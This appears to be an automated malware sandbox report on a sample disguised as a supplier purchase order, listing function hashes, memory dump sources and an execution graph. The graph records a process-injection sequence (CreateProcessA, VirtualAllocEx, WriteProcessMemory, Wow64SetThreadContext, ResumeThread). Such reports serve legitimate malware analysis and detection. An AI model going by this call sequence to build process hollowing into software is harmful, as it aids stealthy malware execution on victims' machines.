                                    • API String ID: 410705778-0
                                    • Opcode ID: 4d82c5e15902f316a9f294ec898b3d55bc279885e922f7f5cb9e58e3964e6338
                                    • Instruction ID: e0cda6a9ea45769f92df8397c079b508352efb86b89a0f19f4a1de41e514971f
                                    • Opcode Fuzzy Hash: 4d82c5e15902f316a9f294ec898b3d55bc279885e922f7f5cb9e58e3964e6338
                                    • Instruction Fuzzy Hash: AC1106B58003499FDB20DF9AC945BDEBBF8FB48310F10845AE919A7301C379A944CFA5
                                    Function 0199D3D8 Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160926213.000000000199D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0199D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_199d000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b06bd943d49f74a86ac2ebf9a023b79611c34afb2a2b7e80bbfcac04f70dd4c7
                                    • Instruction ID: 10f64afca90bd6641c8748d4447b13f6eff3726559602a3ff84387999e606a0e
                                    • Opcode Fuzzy Hash: b06bd943d49f74a86ac2ebf9a023b79611c34afb2a2b7e80bbfcac04f70dd4c7
                                    • Instruction Fuzzy Hash: F221F471500204DFDF05DF58D9C0F66BFA9FB98714F24C569D90D0B296C33AE456C6A2
                                    Function 019AD01C Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160969311.00000000019AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 019AD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19ad000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 536f63f3a554b2c7bf19eff10a57cd4d3f3c2ca0cf7751910bb0e9f87ef6c9b9
                                    • Instruction ID: 5a6265c43b0ae239fd5a58b821ef77f8124b12627ab541500870246aebc8530a
                                    • Opcode Fuzzy Hash: 536f63f3a554b2c7bf19eff10a57cd4d3f3c2ca0cf7751910bb0e9f87ef6c9b9
                                    • Instruction Fuzzy Hash: A6212271684200DFDB15DF68D984F26BFA9FB88314F60C96DD90E4B656C33AD40BCAA1
                                    Function 019AD1D4 Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160969311.00000000019AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 019AD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19ad000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ef388f2e4f03462538d1e2b050a4b0c0cda1f9dae55fcf70dc797b804d4a3a66
                                    • Instruction ID: a630846aa8cd1952c66a7d4568e59180b0382b1e776726b8f2059aa142a7b042
                                    • Opcode Fuzzy Hash: ef388f2e4f03462538d1e2b050a4b0c0cda1f9dae55fcf70dc797b804d4a3a66
                                    • Instruction Fuzzy Hash: CE21F571504204DFDB05DF98D5C0F26BBA9FB84324F60C96DDD0D4B656C33AD40ACAA1
                                    Function 019AD006 Relevance: .1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160969311.00000000019AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 019AD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19ad000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aa442c5d575a85e68ccdab62f1befc647e5ad19d7615b290f22b242d9757b135
                                    • Instruction ID: 7b0c7b1985b4373f05e702e0b9bcab6fc3b3e30d5eedf8b3ef9be200d6c68319
                                    • Opcode Fuzzy Hash: aa442c5d575a85e68ccdab62f1befc647e5ad19d7615b290f22b242d9757b135
                                    • Instruction Fuzzy Hash: E021AE755483808FDB13CF64D994B15BFB1EB45314F28C5AAD8498B6A7C33A940ACBA2
                                    Function 0199D3D3 Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160926213.000000000199D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0199D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_199d000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                    • Instruction ID: 7818619f508ac1fcd4fecd4af59f42b5b89ab1f8b8b2267fe9f511512ab15642
                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                    • Instruction Fuzzy Hash: 2911CD72404240CFDF02CF48D5C4B56BFA2FB84624F24C6A9D9090B256C33AE45ACBA2
                                    Function 019AD1CF Relevance: .1, Instructions: 53COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160969311.00000000019AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 019AD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19ad000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                    • Instruction ID: 095d71ee45f1b33937a33a6c481525d7f66e7b3d6948336db8b8ac4c361aa519
                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                    • Instruction Fuzzy Hash: 7511BB75504280DFDB02CF54C5C4B15BFA1FB84224F24C6A9DC494B6A6C33AD40ACBA2
                                    Function 0199D745 Relevance: .0, Instructions: 45COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160926213.000000000199D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0199D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_199d000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 28dfa64bf0ce8343bde9fcd909085547f0ebd2acf51f97c2f2ee5bdc91a75e42
                                    • Instruction ID: 6cc595511af8361175cdc2053b88d504f12a306551802e36ec76038b587ff19a
                                    • Opcode Fuzzy Hash: 28dfa64bf0ce8343bde9fcd909085547f0ebd2acf51f97c2f2ee5bdc91a75e42
                                    • Instruction Fuzzy Hash: A301A7B10043849AEB209E9DCDC4B6AFFDCEF45325F18C96AED0D4A286D6799841CA71
                                    Function 0199D744 Relevance: .0, Instructions: 36COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2160926213.000000000199D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0199D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_199d000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 494b83329d2abe8f8dcbd3a965d01c12aa922252084cca53c7ecc149e02ae10c
                                    • Instruction ID: b5ba0fc0a1f7dfa54b5dc5b4ec92b0e80300decf081e297dff04f0ae83ec3f8c
                                    • Opcode Fuzzy Hash: 494b83329d2abe8f8dcbd3a965d01c12aa922252084cca53c7ecc149e02ae10c
                                    • Instruction Fuzzy Hash: 93F0C2714043849EEB208E1ACCC8B66FFECEF85235F18C45AED4C0A286C2799840CBB0

                                    Non-executed Functions

                                    Function 07BD749B Relevance: 4.0, Strings: 3, Instructions: 228COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: TJoq$Tejq$xbmq
                                    • API String ID: 0-903294719
                                    • Opcode ID: 028733333793ec7fd0428acac759c156040bc0fde60a4165376516a60e10fc21
                                    • Instruction ID: 47510426545b8d510a39e6b84c14896cf9a4be3506b4d9d20c218a99ffcfdb8f
                                    • Opcode Fuzzy Hash: 028733333793ec7fd0428acac759c156040bc0fde60a4165376516a60e10fc21
                                    • Instruction Fuzzy Hash: 67B161B5E016188FDB58DF6AC944ADDBBF2AF88301F14C1A9D409AB364EB345E858F50
                                    Function 094539E0 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,AF
                                    • API String ID: 0-1694988362
                                    • Opcode ID: 9f997e38e7440415e69619101a88511337857435ea6e19f649f3fb870145309c
                                    • Instruction ID: 1e223e6f23de03a7451cec661e5e292f7d83cd3f206acb3980ac7bbad97c3020
                                    • Opcode Fuzzy Hash: 9f997e38e7440415e69619101a88511337857435ea6e19f649f3fb870145309c
                                    • Instruction Fuzzy Hash: 7CE11574E001198FDB14DFA8C5809AEFBB2FF89341F24826AE815AB356C735AD45CF60
                                    Function 07BD716B Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'jq
                                    • API String ID: 0-3676250632
                                    • Opcode ID: c3da349cbb17bb7d7a8f26c5df9b48efe27c6c751adb29dba9e9de63c71a3640
                                    • Instruction ID: fb8d17e0fa53404610473c6ab936e681ab2e9536c9fb8edd520f9ab523006111
                                    • Opcode Fuzzy Hash: c3da349cbb17bb7d7a8f26c5df9b48efe27c6c751adb29dba9e9de63c71a3640
                                    • Instruction Fuzzy Hash: 10610874A102098FDB18DF6AE941AAA7FF7FB88300F14D529D0199B268EB74AD05CF40
                                    Function 07BD7170 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'jq
                                    • API String ID: 0-3676250632
                                    • Opcode ID: 24f7d70d571630ddc90a5ec7c6d6754d5618d7a97d8809cf4118d3256a6a9ce4
                                    • Instruction ID: 8b50c3d2b09180e6176bb8d6ce662cbc627be8e566bd76dddb1a5915ef1179bb
                                    • Opcode Fuzzy Hash: 24f7d70d571630ddc90a5ec7c6d6754d5618d7a97d8809cf4118d3256a6a9ce4
                                    • Instruction Fuzzy Hash: 9F610874A102098FDB18DF7AE941AAA7FF7FB88300F14D529D0599B268EB74AD05CF50
                                    Function 09451920 Relevance: .3, Instructions: 312COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3d9efd81ce3418b6853f2e07175a85680c29de222e9bbbd25c70e73dadfbf77d
                                    • Instruction ID: d3eb2efba9dc63d344481f5386eafa37c778e6b804517580fe9b946d83032d2b
                                    • Opcode Fuzzy Hash: 3d9efd81ce3418b6853f2e07175a85680c29de222e9bbbd25c70e73dadfbf77d
                                    • Instruction Fuzzy Hash: 1BE12A74E041198FDB14DFA8C580AAEFBB2FF89301F24926AD815AB356D735AD41CF60
                                    Function 09452190 Relevance: .3, Instructions: 312COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a7187afc21323c4c522f6ac8149bf90b13cc020192a1dc8461b94b54ccf2ac65
                                    • Instruction ID: 7a34a89ce6d5827a65efe9c6ebfa3c2c4ca6c62f7b7cb936a9f345c680f83d4a
                                    • Opcode Fuzzy Hash: a7187afc21323c4c522f6ac8149bf90b13cc020192a1dc8461b94b54ccf2ac65
                                    • Instruction Fuzzy Hash: 70E11874E001198FDB14CFA8C5809AEFBB2FF89315F24926AE815AB356C775AD41CF60
                                    Function 094542B8 Relevance: .3, Instructions: 312COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2f7d948d1e1717a4c847b083ee6d163c34e4c18ca97799cf626864cb46d740ab
                                    • Instruction ID: 38c41ceaf12fe2122ada57782cb1442c26fca2eeda9d5789e26d53905d2769fd
                                    • Opcode Fuzzy Hash: 2f7d948d1e1717a4c847b083ee6d163c34e4c18ca97799cf626864cb46d740ab
                                    • Instruction Fuzzy Hash: F5E11A74E001198FDB14CFA8C5809AEFBB2FF89305F24816AD815AB366D735AD81CF60
                                    Function 09451D58 Relevance: .3, Instructions: 312COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a34edbd835f437163acf8aa34372aecbbef46ef25b44dff10e983d33872ce02a
                                    • Instruction ID: 7b9e10e0231d856c4d16b73e791126c1629db39f269315e815498b42471c7073
                                    • Opcode Fuzzy Hash: a34edbd835f437163acf8aa34372aecbbef46ef25b44dff10e983d33872ce02a
                                    • Instruction Fuzzy Hash: BBE1F874E001198FDB14CFA9C5809AEFBB2FF89305F24926AE815AB356D735AD41CF60
                                    Function 019FD4A4 Relevance: .3, Instructions: 264COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 45b22de0f520c0edc3fad335bb63b7213b6ca67dc4f3a5e3bd995dabc279981f
                                    • Instruction ID: 0d26ab5f9435390bb2cceb8dbaebb2ff5abb77b9b22b7328e07629795a0eca28
                                    • Opcode Fuzzy Hash: 45b22de0f520c0edc3fad335bb63b7213b6ca67dc4f3a5e3bd995dabc279981f
                                    • Instruction Fuzzy Hash: CCA1A337E0020A9FCF15DFB4C84049EBBB6FF85301B1545ADEA09AB265DB71D915CB40
                                    Function 09452180 Relevance: .1, Instructions: 134COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 909d29104bd382271ac25beb2b67225f54be6a1f816d639c1b3a56800222736a
                                    • Instruction ID: f7e2a8b63263ebb2fe034bb4bf594978a5a5726f16287d97e0474a50bed0523f
                                    • Opcode Fuzzy Hash: 909d29104bd382271ac25beb2b67225f54be6a1f816d639c1b3a56800222736a
                                    • Instruction Fuzzy Hash: 7551F974E002198FDB14CFA9C5805AEFBF2FF89315F24816AD459AB316D735AA42CF60

                                    Execution Graph

                                    Execution Coverage:11.5%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:260
                                    Total number of Limit Nodes:23
                                    execution_graph 34505 76b51e8 34506 76b519f 34505->34506 34508 76b51f0 34506->34508 34512 76b63ee 34506->34512 34534 76b6390 34506->34534 34555 76b6380 34506->34555 34507 76b5120 34513 76b637c 34512->34513 34514 76b63f1 34512->34514 34515 76b63ce 34513->34515 34576 76b6cd3 34513->34576 34584 76b6ade 34513->34584 34589 76b6dff 34513->34589 34594 76b6eff 34513->34594 34599 76b66d8 34513->34599 34605 76b6bd8 34513->34605 34610 76b6e04 34513->34610 34614 76b6865 34513->34614 34620 76b6a01 34513->34620 34625 76b7002 34513->34625 34630 76b6a2d 34513->34630 34635 76b6fa8 34513->34635 34640 76b66c8 34513->34640 34646 76b69d6 34513->34646 34654 76b6a76 34513->34654 34659 76b6d57 34513->34659 34664 76b6931 34513->34664 34669 76b7053 34513->34669 34514->34507 34515->34507 34535 76b63aa 34534->34535 34536 76b63ce 34535->34536 34537 76b66c8 2 API calls 34535->34537 34538 76b6fa8 2 API calls 34535->34538 34539 76b6a2d 2 API calls 34535->34539 34540 76b7002 2 API calls 34535->34540 34541 76b6a01 2 API calls 34535->34541 34542 76b6865 2 API calls 34535->34542 34543 76b6e04 2 API calls 34535->34543 34544 76b6bd8 2 API calls 34535->34544 34545 76b66d8 2 API calls 34535->34545 34546 76b6eff 2 API calls 34535->34546 34547 76b6dff 2 API calls 34535->34547 34548 76b6ade 2 API calls 34535->34548 34549 76b6cd3 4 API calls 34535->34549 34550 76b7053 2 API calls 34535->34550 34551 76b6931 2 API calls 34535->34551 34552 76b6d57 2 API calls 34535->34552 34553 76b6a76 2 API calls 34535->34553 34554 76b69d6 2 API calls 34535->34554 34536->34507 34537->34536 34538->34536 34539->34536 34540->34536 34541->34536 34542->34536 34543->34536 34544->34536 34545->34536 34546->34536 34547->34536 34548->34536 34549->34536 34550->34536 34551->34536 34552->34536 34553->34536 34554->34536 34556 76b63aa 34555->34556 34557 76b63ce 34556->34557 34558 76b66c8 2 API calls 34556->34558 34559 76b6fa8 2 API calls 34556->34559 34560 76b6a2d 2 API calls 34556->34560 34561 76b7002 2 API calls 34556->34561 34562 76b6a01 2 API calls 34556->34562 34563 76b6865 2 API calls 34556->34563 34564 76b6e04 2 API calls 34556->34564 34565 76b6bd8 2 API calls 34556->34565 34566 76b66d8 2 API calls 34556->34566 34567 76b6eff 2 API calls 34556->34567 34568 76b6dff 2 API calls 34556->34568 34569 76b6ade 2 API calls 34556->34569 34570 76b6cd3 4 API calls 34556->34570 34571 76b7053 2 API calls 34556->34571 34572 76b6931 2 API calls 34556->34572 34573 76b6d57 2 API calls 34556->34573 34574 76b6a76 2 API calls 34556->34574 34575 76b69d6 2 API calls 34556->34575 34557->34507 34558->34557 34559->34557 34560->34557 34561->34557 34562->34557 34563->34557 34564->34557 34565->34557 34566->34557 34567->34557 34568->34557 34569->34557 34570->34557 34571->34557 34572->34557 34573->34557 34574->34557 34575->34557 34577 76b6ce0 34576->34577 34578 76b6d2e 34576->34578 34674 76b46e8 34577->34674 34678 76b46f0 34577->34678 34682 76b4208 34578->34682 34686 76b4200 34578->34686 34579 76b70a4 34690 76b7468 34584->34690 34695 76b7458 34584->34695 34585 76b6a59 34585->34584 34586 76b6f5e 34585->34586 34586->34515 34590 76b6927 34589->34590 34591 76b6939 34590->34591 34701 76b4888 34590->34701 34705 76b4881 34590->34705 34591->34515 34595 76b6f05 34594->34595 34709 76b4978 34595->34709 34713 76b4970 34595->34713 34596 76b6f28 34601 76b670b 34599->34601 34600 76b67a3 34600->34515 34601->34600 34717 76b4b10 34601->34717 34721 76b4b04 34601->34721 34606 76b6b69 34605->34606 34606->34605 34607 76b6956 34606->34607 34608 76b4888 WriteProcessMemory 34606->34608 34609 76b4881 WriteProcessMemory 34606->34609 34607->34515 34608->34606 34609->34606 34725 76b47c8 34610->34725 34729 76b47c1 34610->34729 34611 76b6d75 34611->34610 34616 76b67b7 34614->34616 34615 76b67a3 34615->34515 34616->34615 34618 76b4b10 CreateProcessA 34616->34618 34619 76b4b04 CreateProcessA 34616->34619 34617 76b68ff 34618->34617 34619->34617 34621 76b6927 34620->34621 34622 76b6939 34621->34622 34623 76b4888 WriteProcessMemory 34621->34623 34624 76b4881 WriteProcessMemory 34621->34624 34622->34515 34623->34621 34624->34621 34626 76b6927 34625->34626 34627 76b6939 34625->34627 34626->34627 34628 76b4888 WriteProcessMemory 34626->34628 34629 76b4881 WriteProcessMemory 34626->34629 34627->34515 34628->34626 34629->34626 34631 76b6a53 34630->34631 34633 76b4888 WriteProcessMemory 34631->34633 34634 76b4881 WriteProcessMemory 34631->34634 34632 76b6b44 34633->34632 34634->34632 34638 76b4888 WriteProcessMemory 34635->34638 34639 76b4881 WriteProcessMemory 34635->34639 34636 76b6927 34636->34635 34637 76b6939 34636->34637 34637->34515 34638->34636 34639->34636 34642 76b66d7 34640->34642 34641 76b67a3 34641->34515 34642->34641 34644 76b4b10 CreateProcessA 34642->34644 34645 76b4b04 CreateProcessA 34642->34645 34643 76b68ff 34644->34643 34645->34643 34647 76b6fac 34646->34647 34648 76b6927 34647->34648 34650 76b4888 WriteProcessMemory 34647->34650 34651 76b4881 WriteProcessMemory 34647->34651 34649 76b6939 34648->34649 34652 76b4888 WriteProcessMemory 34648->34652 34653 76b4881 WriteProcessMemory 34648->34653 34649->34515 34650->34648 34651->34648 34652->34648 34653->34648 34656 76b6a83 34654->34656 34655 76b6956 34655->34515 34656->34655 34657 76b4888 WriteProcessMemory 34656->34657 34658 76b4881 WriteProcessMemory 34656->34658 34657->34656 34658->34656 34660 76b6d5d 34659->34660 34662 76b4208 ResumeThread 34660->34662 34663 76b4200 ResumeThread 34660->34663 34661 76b70a4 34662->34661 34663->34661 34665 76b6927 34664->34665 34666 76b6939 34665->34666 34667 76b4888 WriteProcessMemory 34665->34667 34668 76b4881 WriteProcessMemory 34665->34668 34666->34515 34667->34665 34668->34665 34670 76b6d6e 34669->34670 34672 76b4208 ResumeThread 34670->34672 34673 76b4200 ResumeThread 34670->34673 34671 76b70a4 34671->34671 34672->34671 34673->34671 34675 76b4735 Wow64SetThreadContext 34674->34675 34677 76b477d 34675->34677 34677->34578 34679 76b4735 Wow64SetThreadContext 34678->34679 34681 76b477d 34679->34681 34681->34578 34683 76b4248 ResumeThread 34682->34683 34685 76b4279 34683->34685 34685->34579 34687 76b4205 ResumeThread 34686->34687 34689 76b4279 34687->34689 34689->34579 34691 76b747d 34690->34691 34693 76b46e8 Wow64SetThreadContext 34691->34693 34694 76b46f0 Wow64SetThreadContext 34691->34694 34692 76b7493 34692->34585 34693->34692 34694->34692 34696 76b744f 34695->34696 34697 76b7466 34695->34697 34696->34585 34699 76b46e8 Wow64SetThreadContext 34697->34699 34700 76b46f0 Wow64SetThreadContext 34697->34700 34698 76b7493 34698->34585 34699->34698 34700->34698 34702 76b48d0 WriteProcessMemory 34701->34702 34704 76b4927 34702->34704 34704->34590 34706 76b48d0 WriteProcessMemory 34705->34706 34708 76b4927 34706->34708 34708->34590 34710 76b49c3 ReadProcessMemory 34709->34710 34712 76b4a07 34710->34712 34712->34596 34714 76b4978 ReadProcessMemory 34713->34714 34716 76b4a07 34714->34716 34716->34596 34718 76b4b99 34717->34718 34718->34718 34719 76b4cfe CreateProcessA 34718->34719 34720 76b4d5b 34719->34720 34720->34720 34722 76b4b10 CreateProcessA 34721->34722 34724 76b4d5b 34722->34724 34724->34724 34726 76b4808 VirtualAllocEx 34725->34726 34728 76b4845 34726->34728 34728->34611 34730 76b4808 VirtualAllocEx 34729->34730 34732 76b4845 34730->34732 34732->34611 34733 eed4e8 34734 eed52e GetCurrentProcess 34733->34734 34736 eed579 34734->34736 34737 eed580 GetCurrentThread 34734->34737 34736->34737 34738 eed5bd GetCurrentProcess 34737->34738 34740 eed5b6 34737->34740 34739 eed5f3 34738->34739 34741 eed61b GetCurrentThreadId 34739->34741 34740->34738 34742 eed64c 34741->34742 34743 ee4668 34744 ee467a 34743->34744 34747 ee4686 34744->34747 34749 ee4779 34744->34749 34746 ee46a5 34754 ee4210 34747->34754 34750 ee479d 34749->34750 34758 ee4888 34750->34758 34762 ee4879 34750->34762 34755 ee421b 34754->34755 34770 ee5c54 34755->34770 34757 ee6fec 34757->34746 34759 ee48af 34758->34759 34760 ee498c 34759->34760 34766 ee44d4 34759->34766 34763 ee48af 34762->34763 34764 ee44d4 CreateActCtxA 34763->34764 34765 ee498c 34763->34765 34764->34765 34767 ee5918 CreateActCtxA 34766->34767 34769 ee59db 34767->34769 34771 ee5c5f 34770->34771 34774 ee5c74 34771->34774 34773 ee7185 34773->34757 34775 ee5c7f 34774->34775 34778 ee5ca4 34775->34778 34777 ee7262 34777->34773 34779 ee5caf 34778->34779 34782 ee5cd4 34779->34782 34781 ee7365 34781->34777 34783 ee5cdf 34782->34783 34785 ee866b 34783->34785 34788 eead19 34783->34788 34784 ee86a9 34784->34781 34785->34784 34792 eece17 34785->34792 34797 eead3f 34788->34797 34801 eead50 34788->34801 34789 eead2e 34789->34785 34793 eece39 34792->34793 34794 eece5d 34793->34794 34809 eecfc8 34793->34809 34813 eecfc7 34793->34813 34794->34784 34798 eead50 34797->34798 34804 eeae38 34798->34804 34799 eead5f 34799->34789 34803 eeae38 GetModuleHandleW 34801->34803 34802 eead5f 34802->34789 34803->34802 34805 eeae7c 34804->34805 34806 eeae59 34804->34806 34805->34799 34806->34805 34807 eeb080 GetModuleHandleW 34806->34807 34808 eeb0ad 34807->34808 34808->34799 34811 eecfd5 34809->34811 34810 eed00f 34810->34794 34811->34810 34817 eebba0 34811->34817 34814 eecfd5 34813->34814 34815 eebba0 GetModuleHandleW 34814->34815 34816 eed00f 34814->34816 34815->34816 34816->34794 34818 eebba5 34817->34818 34820 eedd28 34818->34820 34821 eed1c4 34818->34821 34820->34820 34822 eed1cf 34821->34822 34823 ee5cd4 GetModuleHandleW 34822->34823 34824 eedd97 34823->34824 34824->34820 34827 76b79d0 34828 76b7b5b 34827->34828 34830 76b79f6 34827->34830 34830->34828 34831 76b75bc 34830->34831 34832 76b7c50 PostMessageW 34831->34832 34834 76b7cbc 34832->34834 34834->34830 34825 eed730 DuplicateHandle 34826 eed7c6 34825->34826

                                    Executed Functions

                                    Function 00EED4D8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 265threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 294 eed4d8-eed4e0 295 eed49b-eef66a 294->295 296 eed4e2-eed577 GetCurrentProcess 294->296 303 eef917-eef91e 295->303 304 eef670-eef695 call eef0ec 295->304 305 eed579-eed57f 296->305 306 eed580-eed5b4 GetCurrentThread 296->306 320 eef697-eef69b 304->320 321 eef6a1-eef6a3 304->321 305->306 307 eed5bd-eed5f1 GetCurrentProcess 306->307 308 eed5b6-eed5bc 306->308 310 eed5fa-eed615 call eed6b7 307->310 311 eed5f3-eed5f9 307->311 308->307 316 eed61b-eed64a GetCurrentThreadId 310->316 311->310 318 eed64c-eed652 316->318 319 eed653-eed6b5 316->319 318->319 320->321 322 eef862-eef864 320->322 323 eef6a5-eef6af 321->323 324 eef6b1 321->324 327 eef866-eef86e 322->327 328 eef870 322->328 326 eef6b6-eef6bb 323->326 324->326 330 eef6bd-eef6cb 326->330 331 eef6fa-eef6fc 326->331 332 eef872-eef874 327->332 328->332 330->331 342 eef6cd-eef6d6 call eef0f8 330->342 335 eef6fe-eef702 331->335 336 eef70b-eef712 331->336 332->303 334 eef87a-eef8fb call eef144 call eef108 332->334 334->303 369 eef8fd-eef912 call eef124 call eef160 334->369 335->336 336->303 337 eef718-eef71a 336->337 339 eef7a3-eef7da call eef144 337->339 340 eef720-eef777 call eef108 call eef118 337->340 357 eef7dc-eef7e3 call eef150 339->357 358 eef7e8-eef83e call eef108 call eef118 339->358 371 eef779-eef78f call eef124 call eef134 340->371 372 eef794-eef7a2 call eed2b8 340->372 342->331 353 eef6d8-eef6f1 342->353 353->331 357->358 384 eef85a-eef861 358->384 385 eef840-eef855 call eef124 call eef160 358->385 369->303 371->372 385->384
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 00EED566
